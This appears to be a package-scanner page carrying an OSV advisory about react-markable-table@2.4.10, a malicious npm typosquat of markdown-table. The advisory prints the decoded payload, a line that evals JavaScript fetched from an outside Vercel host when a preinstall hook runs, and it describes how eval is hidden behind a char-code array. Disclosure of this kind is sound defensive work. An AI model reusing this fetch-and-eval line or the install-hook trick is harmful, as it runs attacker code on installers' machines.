npm

react-markable-table @2.4.10

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 5:45 AM UTC

Malicious

OSV ID

MAL-2026-10446

Ecosystem

npm

Summary

react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field wooorm/markdown-table ). package.json declares a preinstall hook that runs node index.d.js . That script base64-decodes an embedded payload which resolves to eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text())) , and invokes it via globalThis[tag](text) where tag is reconstructed from the char-code array [101,118,97,108] (spelling eval ). Installing the package causes arbitrary attacker-controlled JavaScript to be fetched from a non-publisher Vercel host and executed in-process on the installer's machine at npm install time.

Source: amazon-inspector (da0db97919f41757fe4bcdc456d52ec0ecfbb89741438e5805a7bf5188b022c5)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.